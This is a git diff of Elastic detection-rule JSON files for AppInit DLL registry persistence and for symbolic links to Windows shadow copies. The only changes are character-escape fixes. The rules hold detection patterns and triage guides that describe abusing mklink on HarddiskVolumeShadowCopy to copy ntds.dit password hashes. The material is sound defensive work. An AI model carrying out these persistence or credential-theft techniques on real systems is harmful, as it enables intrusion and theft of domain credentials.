@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Registry Persistence via AppInit DLL", - "note": "## Triage and analysis\n\n### Investigating Registry Persistence via AppInit DLL\n\nAppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads `user32.dll`) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications.\n\nAttackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine.\n\nThis rule identifies modifications on the AppInit registry keys.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related DLL file tied to the Windows Registry entry.\n - Check whether the DLL is signed, and tied to a authorized program used on your environment.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve all DLLs under the AppInit registry keys:\n - !{osquery{\"label\":\"Osquery - Retrieve AppInit Registry Value\",\"query\":\"SELECT * FROM registry r where (r.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows' or\\nr.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows') and r.name ==\\n'AppInit_DLLs'\\n\"}}\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable and the DLLs using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User 
Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Registry Persistence via AppInit DLL\n\nAppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads `user32.dll`) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications.\n\nAttackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine.\n\nThis rule identifies modifications on the AppInit registry keys.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related DLL file tied to the Windows Registry entry.\n - Check whether the DLL is signed, and tied to a authorized program used on your environment.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve all DLLs under the AppInit registry keys:\n - !{osquery{\"label\":\"Osquery - Retrieve AppInit Registry Value\",\"query\":\"SELECT * FROM registry r where (r.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows' or\\nr.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows') and r.name ==\\n'AppInit_DLLs'\\n\"}}\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable and the DLLs using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User 
Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"HKLM\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\"\n ) and not process.executable : (\n \"C:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"C:\\\\Program Files\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\",\n \"C:\\\\Program Files (x86)\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\")\n", "related_integrations": [ { @@ -45,7 +45,7 @@ ], "risk_score": 47, "rule_id": "d0e159cf-73e9-40d1-a9ed-077e3158a855", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", 
@@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_107.json b/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_107.json index c7495cacaae..850f42cbe37 100644 --- a/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_107.json +++ b/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_107.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Registry Persistence via AppInit DLL", - "note": "## Triage and analysis\n\n### Investigating Registry Persistence via AppInit DLL\n\nAppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads `user32.dll`) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications.\n\nAttackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine.\n\nThis rule identifies modifications on the AppInit registry keys.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related DLL file tied to the Windows Registry entry.\n - Check whether the DLL is signed, and tied to a authorized program used on your environment.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve all DLLs under the AppInit registry keys:\n - !{osquery{\"label\":\"Osquery - Retrieve AppInit Registry Value\",\"query\":\"SELECT * FROM registry r where (r.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows' or\\nr.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows') and r.name ==\\n'AppInit_DLLs'\\n\"}}\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable and the DLLs using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User 
Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Registry Persistence via AppInit DLL\n\nAppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads `user32.dll`) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications.\n\nAttackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine.\n\nThis rule identifies modifications on the AppInit registry keys.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related DLL file tied to the Windows Registry entry.\n - Check whether the DLL is signed, and tied to a authorized program used on your environment.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve all DLLs under the AppInit registry keys:\n - !{osquery{\"label\":\"Osquery - Retrieve AppInit Registry Value\",\"query\":\"SELECT * FROM registry r where (r.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows' or\\nr.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows') and r.name ==\\n'AppInit_DLLs'\\n\"}}\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable and the DLLs using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User 
Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"HKLM\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\"\n ) and not process.executable : (\n \"C:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"C:\\\\Program Files\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\",\n \"C:\\\\Program Files (x86)\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\")\n", "related_integrations": [ { 
@@ -45,7 +45,7 @@ ], "risk_score": 47, "rule_id": "d0e159cf-73e9-40d1-a9ed-077e3158a855", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_104.json b/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_104.json index 52f681fd749..d807e345731 100644 --- a/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_104.json +++ b/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_104.json 
@@ -18,7 +18,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Symbolic Link to Shadow Copy Created", - "note": "## Triage and analysis\n\n### Investigating Symbolic Link to Shadow Copy Created\n\nShadow copies are backups or snapshots of an endpoint's files or volumes while they are in use. Adversaries may attempt to discover and create symbolic links to these shadow copies in order to copy sensitive information offline. If Active Directory (AD) is in use, often the ntds.dit file is a target as it contains password hashes, but an offline copy is needed to extract these hashes and potentially conduct lateral movement.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine if a volume shadow copy was recently created on this endpoint.\n- Review privileges of the end user as this requires administrative access.\n- Verify if the ntds.dit file was successfully copied and determine its copy destination.\n- Investigate for registry SYSTEM file copies made recently or saved via Reg.exe.\n- Investigate recent deletions of volume shadow copies.\n- Identify other files potentially copied from volume shadow copy paths directly.\n\n### False positive analysis\n\n- This rule should cause very few false positives. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- NTDS or SAM Database File Copied - 3bc6deaa-fbd4-433a-ae21-3e892f95624f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the entire domain or the `krbtgt` user was compromised:\n - Activate your incident response plan for total Active Directory compromise which should include, but not be limited to, a password reset (twice) of the `krbtgt` user.\n- Locate and remove static files copied from volume shadow copies.\n- Command-Line tool mklink should require administrative access by default unless in developer mode.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nSystem Audit Policies \u003e\nObject Access \u003e\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or 
powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "note": "## Triage and analysis\n\n### Investigating Symbolic Link to Shadow Copy Created\n\nShadow copies are backups or snapshots of an endpoint's files or volumes while they are in use. Adversaries may attempt to discover and create symbolic links to these shadow copies in order to copy sensitive information offline. If Active Directory (AD) is in use, often the ntds.dit file is a target as it contains password hashes, but an offline copy is needed to extract these hashes and potentially conduct lateral movement.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine if a volume shadow copy was recently created on this endpoint.\n- Review privileges of the end user as this requires administrative access.\n- Verify if the ntds.dit file was successfully copied and determine its copy destination.\n- Investigate for registry SYSTEM file copies made recently or saved via Reg.exe.\n- Investigate recent deletions of volume shadow copies.\n- Identify other files potentially copied from volume shadow copy paths directly.\n\n### False positive analysis\n\n- This rule should cause very few false positives. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- NTDS or SAM Database File Copied - 3bc6deaa-fbd4-433a-ae21-3e892f95624f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the entire domain or the `krbtgt` user was compromised:\n - Activate your incident response plan for total Active Directory compromise which should include, but not be limited to, a password reset (twice) of the `krbtgt` user.\n- Locate and remove static files copied from volume shadow copies.\n- Command-Line tool mklink should require administrative access by default unless in developer mode.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name in (\"Cmd.Exe\",\"PowerShell.EXE\") and\n\n /* Create Symbolic Link to Shadow Copies */\n process.args : (\"*mklink*\", \"*SymbolicLink*\") and process.command_line : (\"*HarddiskVolumeShadowCopy*\")\n", "references": [ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mklink", 
@@ -65,7 +65,7 @@
 ],
 "risk_score": 47,
 "rule_id": "d117cbb4-7d56-41b4-b999-bdf8c25648a0",
- "setup": "Ensure advanced audit policies for Windows are enabled, specifically:\nObject Access policies Event ID 4656 (Handle to an Object was Requested)\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nSystem Audit Policies \u003e\nObject Access \u003e\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "Ensure advanced audit policies for Windows are enabled, specifically:\nObject Access policies Event ID 4656 (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -78,7 +78,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
